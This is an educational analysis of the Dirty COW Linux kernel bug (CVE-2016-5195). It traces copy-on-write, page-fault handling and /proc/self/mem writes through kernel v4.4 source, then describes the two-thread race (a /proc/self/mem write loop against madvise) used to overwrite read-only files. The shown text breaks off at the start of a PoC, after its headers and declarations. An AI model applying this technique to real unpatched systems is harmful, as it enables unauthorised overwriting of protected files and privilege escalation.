0x00. Before we start

CVE-2016-5195, also known as Dirty COW, is a famous race-condition bug in the Linux kernel. It allows an unprivileged attacker to overwrite files that they are only permitted to read.

Before we start, let’s go over some background knowledge.

1. Copy-on-Write

Before learning what Dirty COW is, we first need to know what a “COW” is. Let’s start from the basics.

basic COW

COW, short for Copy-On-Write, is a mechanism for reducing the cost of duplicating resources. When a process creates a child with the fork() syscall, the kernel does not copy the parent’s whole address space for the child. Instead it takes a cheaper approach:

The parent and the child share the same page frames, instead of the kernel allocating new page frames for the child and copying the contents.
A new page frame is allocated, and the content copied into it, only when one of them tries to write to a shared page.
Right after fork(), all of these shared page frames are mapped read-only, so the kernel can detect the first write through a page fault and perform the COW.
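
The effect of the steps above can be observed from user space. The following is a minimal sketch, not taken from the original write-up: the function name parent_value_after_child_write() is made up for illustration. A child overwrites a variable after fork(), and the parent checks that its own copy is untouched.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the parent's copy of `value` after a forked child has overwritten
 * its own copy, or -1 if fork()/waitpid() fails or the child misbehaves. */
int parent_value_after_child_write(void)
{
    volatile int value = 1;
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* The first write to a page shared after fork() triggers the copy,
         * so this store lands in a page frame private to the child. */
        value = 2;
        _exit(value == 2 ? 0 : 1);
    }

    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return value;   /* the parent still sees its own, unmodified value */
}
```

Calling parent_value_after_child_write() from main() and printing the result is enough to see that the child’s write never reaches the parent.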

mmap & /proc/self/mem & COW

Similarly, COW also happens when we write to /proc/self/mem, which represents the whole virtual address space of the current process in Linux. If we mmap() a read-only file as a private mapping (MAP_PRIVATE) and then try to overwrite the mapping through /proc/self/mem, COW kicks in and a private copy of the corresponding file content is made, so the original file is not affected.
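
Here is a small sketch of that behaviour as it is expected to look on a patched kernel. It is an illustration only: the function name and the scratch file under /tmp are assumptions, and the function returns -1 when /proc/self/mem is not usable in the current environment.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if a write through /proc/self/mem changed only the private
 * mapping, 0 if the file itself changed, -1 if any setup step failed. */
int private_write_leaves_file_intact(void)
{
    char path[] = "/tmp/cow_demo_XXXXXX";   /* hypothetical scratch file */
    char from_file[4];
    char *map;
    int mem_fd;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                            /* the file lives on until fd is closed */

    if (write(fd, "AAAA", 4) != 4)
        goto out_fd;
    map = mmap(NULL, 4, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED)
        goto out_fd;
    mem_fd = open("/proc/self/mem", O_RDWR);
    if (mem_fd < 0)
        goto out_map;

    /* The file offset in /proc/self/mem is the virtual address to access. */
    if (pwrite(mem_fd, "BBBB", 4, (off_t)(uintptr_t)map) != 4)
        goto out_mem;
    if (pread(fd, from_file, 4, 0) != 4)
        goto out_mem;

    if (memcmp(from_file, "AAAA", 4) != 0)
        result = 0;                          /* the file was modified */
    else if (memcmp(map, "BBBB", 4) == 0)
        result = 1;                          /* only the private copy changed */

out_mem:
    close(mem_fd);
out_map:
    munmap(map, 4);
out_fd:
    close(fd);
    return result;
}
```

Note that the mapping is created with PROT_READ only, yet the write through /proc/self/mem is accepted. Why that is allowed is exactly what the rest of this section digs into.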

2. page fault

The Memory Management Unit (MMU) translates virtual addresses to physical addresses. However, a memory access may hit an address that currently has no valid PTE (page table entry), or whose PTE does not permit the access, which means that the process tried to access a page that is not ready for it. In that case the CPU raises an exception called a page fault.

Despite the name “fault”, it does not necessarily mean that something has gone wrong. It only indicates that the kernel has to step in before the access can proceed.

A page fault may happen when:

We try to access a page that is not in physical memory.
We try to access a page in a way that we don’t have permission for.

More precisely, there are three kinds of page fault:

When we access a valid address:
- There is no corresponding page frame in memory. The content is read from disk into memory and the kernel sets up the mapping. This is a hard (major) page fault.
- The page is already in memory, but the mapping has not been established yet (e.g. shared memory). The kernel only needs to set up the mapping. This is a soft (minor) page fault.
When we access an invalid address:
- The address is not in the process’s address space. The process receives SIGSEGV, which kills it by default. This is an invalid page fault.

Handle the page fault in Linux kernel

Now we’re going to analyze the page fault handling code of Linux kernel v4.4, which still contains Dirty COW : )

We mainly focus on the case of using /proc/self/mem to write to the memory mapping of a read-only file, which triggers the copy-on-write and the vulnerability.

By the way, the Linux kernel source code can be browsed online at https://elixir.bootlin.com/.

For general page fault handling, whether the entry point is __do_page_fault() or faultin_page(), both end up calling handle_mm_fault(), and the control flow is as below:

handle_mm_fault()	// allocate the PTE
	__handle_mm_fault()
		handle_pte_fault()
			// there are two branches we mainly focus on
			do_wp_page()
			do_fault()
				// there are three branches here and only one will be taken
				do_read_fault()
				do_cow_fault()  // we mainly focus on it
				do_shared_fault()

① handle_pte_fault(): handle page fault according to the PTE

The function is defined in mm/memory.c. It handles the page fault according to the state of the PTE.

/*
 * These routines also need to handle stuff like marking pages dirty
 * and/or accessed for architectures that don't do it in hardware (most
 * RISC architectures).  The early dirtying is also good on the i386.
 *
 * There is also a hook called "update_mmu_cache()" that architectures
 * with external mmu caches can use to update those (ie the Sparc or
 * PowerPC hashed page tables that act as extended TLBs).
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), and pte mapped but not yet locked.
 * We return with pte unmapped and unlocked.
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)

First, it checks whether the page is present (e.g. on x86, the PTE has a present bit, _PAGE_PRESENT, that indicates whether the page is in memory). If it is not, we need to either allocate a new page frame or swap the old page back in:

{
	//...
	entry = *pte;
	barrier();
	if (!pte_present(entry)) {// page is not present
		if (pte_none(entry)) {// pte is NULL, this's the first time of access
			if (vma_is_anonymous(vma))//for anonymous vma, a zero-page will be allocated
				return do_anonymous_page(mm, vma, address,
							 pte, pmd, flags);
			else
				// non-anonymous vma
				// just allocate the page and write corresponding content later
				return do_fault(mm, vma, address, pte, pmd,
						flags, entry);
		}
		// the page is swapped to external storage, just swap it back is okay
		return do_swap_page(mm, vma, address,
					pte, pmd, flags, entry);
	}
	//...

If the page is already in main memory, it checks whether _PAGE_PROTNONE is set. If so, it takes the do_numa_page() path.

If not, it checks whether FAULT_FLAG_WRITE is set, i.e. whether this is a write access. If it is, it then checks whether the PTE permits writing. If it does not, it’s time for COW!

//...

if (pte_protnone(entry)) // the _PAGE_PROTNONE is set
	return do_numa_page(mm, vma, address, entry, pte, pmd);

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
	goto unlock;
if (flags & FAULT_FLAG_WRITE) {// FAULT_FLAG_WRITE means that it's a writing access
	if (!pte_write(entry)) // no permission to write this page frame
		// write-protect fault: do_wp_page() breaks COW (copies or reuses the page)
		return do_wp_page(mm, vma, address,
				pte, pmd, ptl, entry);
	entry = pte_mkdirty(entry);
}

// ...
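
The decisions made by handle_pte_fault() can be condensed into a tiny user-space model. This is only a sketch for following the excerpts above: struct pte_model, the PATH_* constants and classify_pte_fault() are invented names, not kernel APIs, and locking and dirty/accessed bookkeeping are left out.

```c
#include <stdbool.h>

/* Which branch of handle_pte_fault() a fault would take (model only). */
enum pte_fault_path {
    PATH_DO_ANONYMOUS_PAGE,
    PATH_DO_FAULT,
    PATH_DO_SWAP_PAGE,
    PATH_DO_NUMA_PAGE,
    PATH_DO_WP_PAGE,
    PATH_UPDATE_FLAGS   /* nothing to fault in, only PTE flags are updated */
};

/* The few PTE properties that the excerpts above test. */
struct pte_model {
    bool present;   /* pte_present() */
    bool none;      /* pte_none(): never populated */
    bool protnone;  /* pte_protnone() */
    bool writable;  /* pte_write() */
};

enum pte_fault_path classify_pte_fault(struct pte_model pte,
                                       bool vma_is_anonymous,
                                       bool write_access)
{
    if (!pte.present) {
        if (pte.none)   /* first access to this address */
            return vma_is_anonymous ? PATH_DO_ANONYMOUS_PAGE : PATH_DO_FAULT;
        return PATH_DO_SWAP_PAGE;       /* swapped out earlier */
    }
    if (pte.protnone)
        return PATH_DO_NUMA_PAGE;
    if (write_access && !pte.writable)
        return PATH_DO_WP_PAGE;         /* write to a read-only PTE */
    return PATH_UPDATE_FLAGS;
}
```

For the case studied here, a first write access to a file mapping takes PATH_DO_FAULT, and a later write to the resulting read-only PTE takes PATH_DO_WP_PAGE.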

② do_fault(): call specific function according to the kind of fault

This function is also in mm/memory.c. It dispatches to a specific handler according to the kind of fault.

/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		unsigned int flags, pte_t orig_pte)
{
	pgoff_t pgoff = (((address & PAGE_MASK)
			- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

	pte_unmap(page_table);
	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
	if (!vma->vm_ops->fault)
		return VM_FAULT_SIGBUS;
	if (!(flags & FAULT_FLAG_WRITE))// not a writing access(only to read)
		return do_read_fault(mm, vma, address, pmd, pgoff, flags,
				orig_pte);
	if (!(vma->vm_flags & VM_SHARED))// not accessing shared memory(private file mapping)
		return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
				orig_pte); // copy-on-write
	// fault for accessing shared memory
	return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}
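
To make the two computations in do_fault() concrete, here is a small user-space sketch. The names fault_pgoff(), pick_fault_handler() and the DEMO_* constants are made up for illustration, and a 4 KiB page size is assumed.

```c
#include <stdbool.h>

#define DEMO_PAGE_SHIFT 12                           /* assumption: 4 KiB pages */
#define DEMO_PAGE_MASK  (~((1UL << DEMO_PAGE_SHIFT) - 1))

enum demo_fault_handler { DEMO_READ_FAULT, DEMO_COW_FAULT, DEMO_SHARED_FAULT };

/* Page index inside the file that backs the faulting address:
 * pages from the start of the vma plus the file offset of the vma. */
unsigned long fault_pgoff(unsigned long address, unsigned long vm_start,
                          unsigned long vm_pgoff)
{
    return (((address & DEMO_PAGE_MASK) - vm_start) >> DEMO_PAGE_SHIFT)
           + vm_pgoff;
}

/* Same decision order as do_fault(): reads first, then private writes. */
enum demo_fault_handler pick_fault_handler(bool write_access, bool vma_shared)
{
    if (!write_access)
        return DEMO_READ_FAULT;
    if (!vma_shared)
        return DEMO_COW_FAULT;
    return DEMO_SHARED_FAULT;
}
```

For example, a fault at 0x7f0000003abc in a vma that starts at 0x7f0000000000 and maps the file from page 2 onwards refers to page 5 of the file. The important point for Dirty COW is the first branch: a fault that is not flagged as a write always ends up in do_read_fault(), even on a private mapping.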

③ do_cow_fault(): make the basic paging

The function is also located in mm/memory.c. It allocates a new page and calls __do_fault() to handle the fault, so that the corresponding file data ends up in the new page. Finally, the PTE for the faulting address is set to point to the new page.

static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd,
		pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
	//...

	// allocate a new page for the page fault address
	new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
	if (!new_page)
		return VM_FAULT_OOM;

	//...

	// the vma->vm_ops.fault() will be called
	// for file-related operation(e.g. writing to a mapping page of a file),
	// it'll copy the data of the file to the page
	// (e.g. for ext4, ext4_file_fault() will be called to do it)
	ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;

	// some checks...

	// mapping the new page to the page fault address
	do_set_pte(vma, address, new_page, pte, true, true);
	
	//...

The core of __do_fault() is simply a call to the fault handler in the vm_area’s operation table (vma->vm_ops->fault).

/*
 * The mmap_sem must have been held on entry, and may have been
 * released depending on flags and vma->vm_ops->fault() return value.
 * See filemap_fault() and __lock_page_retry().
 */
static int __do_fault(struct vm_area_struct *vma, unsigned long address,
			pgoff_t pgoff, unsigned int flags,
			struct page *cow_page, struct page **page)
{
	struct vm_fault vmf;
	int ret;

	//...

	ret = vma->vm_ops->fault(vma, &vmf);
	
	//...

do_cow_fault() sets up the basic paging, but the actual write of the new data has not happened yet. So let’s come to the final step now.

④ do_wp_page(): make the copy-on-write

When the page is in memory but we don’t have permission to write to it, do_wp_page() performs the copy-on-write: it makes a copy of the original page, so our write only affects this separate new page frame.

/*
 * This routine handles present pages, when users try to write
 * to a shared page. It is done by copying the page to a new address
 * and decrementing the shared-page counter for the old page.
 *
 * Note that this routine assumes that the protection checks have been
 * done by the caller (the low-level page fault routine in most cases).
 * Thus we can safely just mark it writable once we've done any necessary
 * COW.
 *
 * We also mark the page dirty at this point even though the page will
 * change only once the write actually happens. This avoids a few races,
 * and potentially makes it more efficient.
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), with pte both mapped and locked.
 * We return with mmap_sem still held, but pte unmapped and unlocked.
 */
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		spinlock_t *ptl, pte_t orig_pte)
	__releases(ptl)
{

First, it checks whether this is a special mapping page. If so, it checks whether the vm_area has both VM_WRITE and VM_SHARED set, which means that it’s a shared, writable memory region and we only need to make the page writable. If not, wp_page_copy() is called to do the COW.

struct page *old_page;

// get the `page` struct for the address that caused the page fault
// for some special mappings, the kernel doesn't want them to appear in mm management,
// so vm_normal_page() returns NULL for them
// (e.g. raw PFN mappings or the zero page)
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) {// it's a special mapping page
	/*
	 * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
	 * VM_PFNMAP VMA.
	 *
	 * We should not cow pages in a shared writeable mapping.
	 * Just mark the pages writable and/or call ops->pfn_mkwrite.
	 */
	if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
			     (VM_WRITE|VM_SHARED))
		return wp_pfn_shared(mm, vma, address, page_table, ptl,
				     orig_pte, pmd);

	pte_unmap_unlock(page_table, ptl);
	return wp_page_copy(mm, vma, address, page_table, pmd,
			    orig_pte, old_page);
}

For a normal page, if it’s an anonymous page (not backed by a file, e.g. stack and heap), the kernel checks how many users map it. If there is only one, it is enough to mark the page writable.

/*
 * Take out anonymous pages first, anonymous shared vmas are
 * not dirty accountable.
 */
if (PageAnon(old_page) && !PageKsm(old_page)) {//it's an anonymous page && not ksm
	if (!trylock_page(old_page)) {
		page_cache_get(old_page);
		pte_unmap_unlock(page_table, ptl);
		lock_page(old_page);
		page_table = pte_offset_map_lock(mm, pmd, address,
						 &ptl);
		if (!pte_same(*page_table, orig_pte)) {
			unlock_page(old_page);
			pte_unmap_unlock(page_table, ptl);
			page_cache_release(old_page);
			return 0;
		}
		page_cache_release(old_page);
	}
	// check whether only one process is using the page (by reuse_swap_page())
	// if so, it is fine to just reuse the page
	if (reuse_swap_page(old_page)) {
		/*
		 * The page is all ours.  Move it to our anon_vma so
		 * the rmap code will not search our parent or siblings.
		 * Protected against the rmap code by the page lock.
		 */
		page_move_anon_rmap(old_page, vma, address);
		unlock_page(old_page);
		// just mark the page writable
		return wp_page_reuse(mm, vma, address, page_table, ptl,
				     orig_pte, old_page, 0, 0);
	}
	unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
				(VM_WRITE|VM_SHARED))) {
	return wp_page_shared(mm, vma, address, page_table, pmd,
			      ptl, orig_pte, old_page);
}

Once all the cases above are ruled out, it’s time to do the copy-on-write. A new page is allocated and the content of the old page is copied into it by wp_page_copy().

	/*
	 * Ok, we need to copy. Oh, well..
	 */
	page_cache_get(old_page);

	pte_unmap_unlock(page_table, ptl);
	// copy the page now
	return wp_page_copy(mm, vma, address, page_table, pmd,
			    orig_pte, old_page);
}

3. COW while writing to /proc/self/mem

So when we use mmap() to map a read-only file and then write directly to the mapped area through /proc/self/mem, the control flow is as below:

SYSCALL: flow of write()

The write() syscall enters sys_write() in the kernel, which is defined in fs/read_write.c:

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos = file_pos_read(f.file);
		ret = vfs_write(f.file, buf, count, &pos);
		if (ret >= 0)
			file_pos_write(f.file, pos);
		fdput_pos(f);
	}

	return ret;
}

This function eventually calls the write() function from the file struct’s file_operations table.

entry_SYSCALL_64()
	sys_write()
		vfs_write()
			__vfs_write()
				file->f_op->write()

For /proc/self/mem this is mem_write(), whose core is actually mem_rw(), defined in fs/proc/base.c. It allocates a temporary page to stage the data and does the real work through access_remote_vm().

static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
	struct mm_struct *mm = file->private_data;
	unsigned long addr = *ppos;
	ssize_t copied;
	char *page;

	if (!mm)
		return 0;

	// allocate temp page
	page = (char *)__get_free_page(GFP_TEMPORARY);
	if (!page)
		return -ENOMEM;

	copied = 0;
	if (!atomic_inc_not_zero(&mm->mm_users))
		goto free;

	while (count > 0) {
		int this_len = min_t(int, count, PAGE_SIZE);

		// copy the data from userspace to the temp page first
		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		// core: access_remote_vm()
		this_len = access_remote_vm(mm, addr, page, this_len, write);
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		// if the operation is read, temp page has the data we need now, just copy back
		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len;
		addr += this_len;
		copied += this_len;
		count -= this_len;
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}

mem_rw() handles both reading and writing. The core of the read/write operation is in access_remote_vm(), which calls __access_remote_vm(), defined in mm/memory.c:

/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, int write)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */

Its core is a loop that copies the data page by page. First it tries to get the destination page’s page struct with get_user_pages(). If that fails, it looks up the vma that the target address belongs to and calls vma->vm_ops->access() to handle it.

	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		ret = get_user_pages(tsk, mm, addr, 1,
				write, 1, &page, &vma);
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif

If it successfully gets the page struct, it uses kmap() to temporarily map the page into the kernel’s virtual address space (which is required for highmem pages), so that the page frame can be read or written through that address. Then the actual read/write takes place.

		} else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			// map the page into the kernel's address space with kmap()
			maddr = kmap(page);
			if (write) {
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes); // write to page
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes); // read from page
			}
			kunmap(page);	// unmap the page
			page_cache_release(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}
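
The per-page arithmetic in this loop (offset, bytes) is easy to check in isolation. The following sketch reuses the same computation in user space. split_by_page() and DEMO_PAGE_SIZE are illustrative names, and a 4 KiB page size is assumed.

```c
#include <stddef.h>

#define DEMO_PAGE_SIZE 4096UL   /* assumption: 4 KiB pages */

/* Splits the range [addr, addr + len) at page boundaries, the same way the
 * loop in __access_remote_vm() does. Stores each chunk size in chunks[] and
 * returns the number of chunks (at most max_chunks). */
size_t split_by_page(unsigned long addr, size_t len,
                     size_t *chunks, size_t max_chunks)
{
    size_t n = 0;

    while (len > 0 && n < max_chunks) {
        size_t offset = addr & (DEMO_PAGE_SIZE - 1);  /* offset inside the page */
        size_t bytes = len;

        if (bytes > DEMO_PAGE_SIZE - offset)          /* stop at the page end */
            bytes = DEMO_PAGE_SIZE - offset;

        chunks[n++] = bytes;
        len -= bytes;
        addr += bytes;
    }
    return n;
}
```

A 0x30-byte access starting at 0x1ff0 is split into a 0x10-byte chunk that finishes the first page and a 0x20-byte chunk at the start of the next one, so get_user_pages() is called once per page touched.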

So let’s look at how get_user_pages() gets the page. It calls __get_user_pages_locked(), which in turn calls __get_user_pages(), defined in mm/gup.c. It mainly uses one big loop to handle everything:

long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask;
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;

	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

We mainly focus on the core of this loop. It first uses follow_page_mask() to get the page struct for the target virtual address. If that fails, we cannot access the page frame right now. There are two possible reasons:

There is no physical page frame for this virtual address.
We don’t have permission to access the page in the requested way (e.g. we’re trying to write to an unwritable page).

This situation amounts to a “page fault”, and the kernel calls faultin_page() to handle it.

		//...
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ? i : -ERESTARTSYS;
		cond_resched();
		//get the `page` struct of virtual address' physical page frame
		page = follow_page_mask(vma, start, foll_flags, &page_mask);
		if (!page) {// "page fault"
			int ret;
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);
			switch (ret) {
			case 0:
				goto retry;//page fault handled successfully, retry our operation
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		}

		//...

For copy-on-write, it goes like this:

When we access a page for the first time, there is no physical page frame for it (the kernel is lazy: it only creates the vm_area_struct at first and allocates the page when it is actually accessed), so follow_page_mask() returns NULL, indicating a page fault. faultin_page() then handles it and a physical page frame is allocated.
Execution then goes back to the retry label and calls follow_page_mask() again. If we’re trying to write to an unwritable page, follow_page_mask() returns NULL again, indicating another page fault. faultin_page() then does the copy-on-write.

/proc/self/mem represents the whole memory of a process, and writes through it are always allowed for the process itself: __access_remote_vm() passes force = 1 to get_user_pages(), which sets FOLL_FORCE. So writing to a read-only mapped page does not raise SIGSEGV; the copy-on-write is done instead.

So the whole chain is as below:

mem_rw()
	__get_free_page()
	access_remote_vm()
		__access_remote_vm()
			get_user_pages()
				__get_user_pages_locked()
					__get_user_pages()
						follow_page_mask()
						faultin_page()

Now let’s have a look at faultin_page().

The first page fault

As described above, the first lookup finds no physical page frame, so follow_page_mask() returns NULL and faultin_page(), which is defined in mm/gup.c, is called to handle the fault:

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	//...

	ret = handle_mm_fault(mm, vma, address, fault_flags);

	//...

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags &= ~FOLL_WRITE;
	return 0;
}

It eventually calls handle_mm_fault() to handle the page fault, as below:

faultin_page()
    handle_mm_fault()
        __handle_mm_fault()
            handle_pte_fault()//pte is NULL, first time of access
                do_fault()//non-anonymous page, just take it in
                    do_cow_fault()//we're going to write the page
                        do_set_pte()
                            maybe_mkwrite()
                                pte_mkdirty()//mark it dirty

Notice the final stage of faultin_page(): if the handler returned VM_FAULT_WRITE (meaning that COW has been broken) and the vma is not writable, it clears the FOLL_WRITE bit in the caller’s flags field. This first fault goes through do_cow_fault(), which does not report VM_FAULT_WRITE, so FOLL_WRITE stays set for now.

The second page fault

Although we’d like to write to a read-only mapped page through /proc/self/mem, the page installed by the first fault is still mapped read-only, because the vma lacks VM_WRITE. follow_page_mask() is still called with FOLL_WRITE, so it returns NULL again, indicating another page fault.

So we enter faultin_page() again to do the copy-on-write. This time do_wp_page() finds that the page is an anonymous page used only by us, so it simply reuses it and returns VM_FAULT_WRITE. As a result, the FOLL_WRITE bit of the variable foll_flags in __get_user_pages() is cleared in the final stage of faultin_page().

The call chain is as below:

faultin_page()
    handle_mm_fault()
        __handle_mm_fault()
            handle_pte_fault()
                do_wp_page()
                    reuse_swap_page(old_page)
                    wp_page_reuse()

After these two page faults, we’re back at the retry label in __get_user_pages() and try to get the page for the third time. FOLL_WRITE is now cleared, so the kernel treats the lookup as a read and no longer requires the PTE to be writable. follow_page_mask() therefore finally returns the page.

0x01. Analysis of the vulnerability

Now let’s review the whole process of writing to a read-only mapped file through /proc/self/mem.

Race condition in a multi-threaded environment

Notice that follow_page_mask() decides whether the page is going to be written by the FOLL_WRITE bit of foll_flags, whereas whether the data is actually written is decided by the write parameter passed to mem_rw(). So there is a subtle race condition here. Let’s start two threads to trigger it:

Thread[1]: Repeatedly writes data to the read-only mmapped file through /proc/self/mem. This triggers the copy-on-write.
Thread[2]: Repeatedly calls the madvise() syscall (with MADV_DONTNEED) to tell the kernel that the memory area of the read-only mmapped file is no longer needed. The page frame of this area is then released and the PTE is cleared.

Then it comes to the interesting part:

Four page lookups & three page faults

We can easily see that a race like this is possible:

Thread[1] has finished the two page faults and is about to get the page for the third time.
Thread[2] calls madvise() and the page is dropped.
Thread[1] fails to get the page for the third time, so there is a “page fault” again.

Now a page is mapped in again, much as in the first page fault. But this time FOLL_WRITE is already cleared, so the kernel thinks “we’re going to read this page”: the fault is handled as a read fault and maps the file’s own page rather than a private copy. The fourth attempt to get the page then succeeds “normally”.

But back in mem_rw(), we are in fact writing to the page. So the page that backs the file is written directly, and we have completed a privileged overwrite of a read-only file.
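
The sequence can be replayed with a deterministic toy model of the retry loop. Everything in this sketch is an assumption made for illustration: the PTE is reduced to three states, the model_* functions only mimic the decisions described above, and the racing madvise() is simulated by clearing the PTE right before a chosen lookup.

```c
#include <stdbool.h>

/* What the PTE of the target address points to (toy model). */
enum pte_state {
    PTE_NONE,       /* nothing mapped */
    PTE_COW_RO,     /* private COW copy, mapped read-only */
    PTE_FILE_RO     /* the file's own page-cache page, mapped read-only */
};

struct gup_result {
    enum pte_state page;    /* page finally handed back to the writer */
    int lookups;            /* modelled follow_page_mask() calls */
    int faults;             /* modelled faultin_page() calls */
};

/* Lookup fails if nothing is mapped, or if a write is requested while the
 * PTE is read-only (both mapped states in this model are read-only). */
static bool model_follow_page(enum pte_state pte, bool foll_write)
{
    return pte != PTE_NONE && !foll_write;
}

static void model_faultin_page(enum pte_state *pte, bool *foll_write)
{
    if (*pte == PTE_NONE) {
        /* write fault: do_cow_fault(); read fault: do_read_fault() */
        *pte = *foll_write ? PTE_COW_RO : PTE_FILE_RO;
        return;
    }
    /* do_wp_page() broke COW and the vma is not writable: drop FOLL_WRITE */
    *pte = PTE_COW_RO;
    *foll_write = false;
}

/* zap_before_lookup == 0 means no race; otherwise the simulated madvise()
 * clears the PTE just before that lookup. */
struct gup_result model_get_page_for_write(int zap_before_lookup)
{
    struct gup_result r = { PTE_NONE, 0, 0 };
    enum pte_state pte = PTE_NONE;
    bool foll_write = true;

    for (;;) {
        r.lookups++;
        if (r.lookups == zap_before_lookup)
            pte = PTE_NONE;
        if (model_follow_page(pte, foll_write))
            break;
        model_faultin_page(&pte, &foll_write);
        r.faults++;
    }
    r.page = pte;
    return r;
}
```

Without interference, model_get_page_for_write(0) needs three lookups and two faults and ends on the private copy. With the PTE cleared before the third lookup, model_get_page_for_write(3) needs four lookups and three faults and ends on the file’s own page, which is the page that mem_rw() then writes to.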

0x02. Exploit

So now we know how Dirty COW works: just use two threads to trigger the race condition.

Thread[1]: Repeatedly writes data to the read-only mmapped file through /proc/self/mem.
Thread[2]: Repeatedly calls madvise() to tell the kernel that the memory area of the read-only mmapped file is no longer needed.

PoC

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * poc by arttnba3
 * 2021.4.14
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

struct stat dst_st, fk_st;
void * map;
char *fake_content;

void * madviseThread(void * argv);
